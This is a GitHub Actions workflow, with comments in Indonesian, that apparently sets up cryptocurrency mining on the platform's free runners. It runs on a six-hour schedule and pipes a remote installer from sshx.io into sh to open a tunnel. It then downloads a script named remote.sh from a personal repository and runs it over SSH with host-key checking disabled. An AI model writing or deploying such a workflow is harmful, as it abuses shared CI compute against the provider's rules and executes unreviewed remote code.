name: sshx-vps-mining

on:
  workflow_dispatch:
  schedule:
    - cron: "0 */6 * * *"  # Jalan otomatis tiap 6 jam

jobs:
  mining:
    runs-on: ubuntu-latest
    timeout-minutes: 360

    steps:
      - name: Connect to SSHX VPS and run remote miner
        run: |
          echo "[+] Starting SSHX Tunnel..."
          curl -sSf https://sshx.io/get | sh -s run > log.txt &

          sleep 5

          LINK=$(grep -o 'https://sshx.io/[^ ]*' log.txt | head -n1)
          HOST=$(echo $LINK | cut -d/ -f3)
          echo "[+] SSHX Link: $LINK"

          sudo apt update -y > /dev/null
          sudo apt install -y netcat > /dev/null

          # Tunggu sampai SSHX siap (port 2222 terbuka)
          for i in {1..15}; do
            echo "[*] Menunggu koneksi SSHX tersedia ($i/15)..."
            nc -z $(echo $HOST | cut -d: -f1) 2222 && break
            sleep 2
          done

          echo "[+] Menjalankan script mining di VPS via SSH..."
          curl -sO https://raw.githubusercontent.com/Nsal12/sal/refs/heads/main/remote.sh
          chmod +x remote.sh

          ssh -o StrictHostKeyChecking=no -p 2222 sshx@$HOST 'bash -s' < remote.sh
